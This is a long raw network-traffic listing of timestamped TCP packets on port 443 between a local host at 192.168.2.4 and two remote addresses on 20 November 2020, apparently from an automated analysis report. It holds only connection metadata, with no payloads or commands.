                                                                                                                                                Nov 20, 2020 11:26:39.759876966 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.759881973 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.759896994 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.759923935 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.759938955 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.759942055 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.759967089 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.759983063 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.759996891 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760001898 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760016918 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760021925 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760039091 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760055065 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760061979 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760073900 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760085106 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760096073 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760102987 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760123968 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760126114 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760143995 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760153055 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760169029 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760201931 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760204077 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760220051 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760225058 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760251045 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760265112 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760271072 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760282040 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760293961 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760313988 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760313988 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760329008 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760339022 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760356903 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760359049 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760380983 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760381937 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760396957 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760406017 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760415077 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760437965 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760456085 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760458946 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760478020 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760479927 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760499001 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760504961 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760524035 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760529041 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760554075 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760571003 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760574102 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760596037 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760598898 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760617018 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760622978 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760632038 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760642052 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760660887 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760665894 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760679960 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760695934 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760701895 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760719061 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760720968 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760746956 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760770082 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760772943 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760780096 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760804892 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760804892 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760822058 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760832071 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760859966 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760890007 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760898113 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760910988 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760926962 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760941029 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760958910 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.760977030 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.760997057 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761002064 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761015892 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761025906 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761029959 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761059046 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761059046 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761084080 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761089087 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761121035 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761126041 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761140108 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761153936 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761182070 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761194944 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761214018 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761214018 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761239052 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761245966 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761265993 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761279106 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761306047 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761307001 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761337042 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761337042 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761362076 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761364937 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761388063 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761419058 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761437893 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761446953 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761467934 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761482000 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761487961 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761502028 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761518002 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761523962 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761539936 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.761544943 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761560917 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.761609077 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.804822922 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821265936 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821317911 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821343899 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821361065 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821368933 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821388960 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821398020 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821433067 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821438074 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821454048 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821481943 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821506023 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821517944 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821521997 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821536064 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821552992 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821577072 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821580887 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821603060 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821614981 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821628094 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821635008 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821670055 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821676970 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821682930 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821703911 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821738005 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821739912 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821754932 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821764946 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821791887 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821795940 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821811914 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821815968 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821842909 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821849108 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821860075 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821877956 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821892023 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821893930 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821914911 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821916103 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821943998 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821953058 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821969032 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.821969986 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.821994066 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822000980 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822022915 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822025061 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822047949 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822065115 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822081089 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822082996 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822103024 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822107077 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822127104 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822132111 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822153091 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822158098 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822184086 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822201967 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822206020 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822220087 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822235107 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822240114 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822262049 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822268963 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822287083 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822288036 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822309971 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822313070 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822330952 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822340012 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822360039 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822365999 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822392941 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822396994 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822417021 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822419882 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822443962 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822446108 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822474957 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822480917 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822499990 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822499990 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822524071 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822532892 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822555065 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822559118 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822577000 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822586060 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822613955 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822617054 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822634935 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822645903 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822664022 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822666883 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822701931 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822705984 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822722912 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822724104 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822750092 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822757006 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822767973 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822781086 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822793961 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822804928 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822818995 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822825909 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822839975 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822844028 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822861910 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822876930 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822891951 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822892904 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822907925 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822911978 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822940111 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822947979 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822966099 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822977066 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.822985888 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.822998047 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823029995 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823031902 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823046923 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823050976 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823085070 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823091984 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823103905 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823112965 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823139906 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823143005 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823169947 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823185921 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823188066 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823208094 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823210001 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.823229074 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823252916 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.823273897 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.885512114 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:56.761187077 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.614061117 CET49746443192.168.2.4162.159.138.232
                                                                                                                                                Nov 20, 2020 11:27:06.630486965 CET44349746162.159.138.232192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.630573988 CET49746443192.168.2.4162.159.138.232
                                                                                                                                                Nov 20, 2020 11:27:06.631123066 CET49746443192.168.2.4162.159.138.232
                                                                                                                                                Nov 20, 2020 11:27:06.647695065 CET44349746162.159.138.232192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.647797108 CET49746443192.168.2.4162.159.138.232
                                                                                                                                                Nov 20, 2020 11:27:06.773752928 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.790064096 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.790304899 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.816673994 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.833084106 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.835170984 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.835208893 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.835222006 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.835330963 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.884324074 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.900736094 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.901689053 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.903000116 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.924758911 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.941123009 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959711075 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959738016 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959753990 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959764957 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959781885 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959794044 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959813118 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959825993 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959842920 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959858894 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959861040 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.959872007 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959884882 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959903002 CET44349747162.159.135.233192.168.2.4
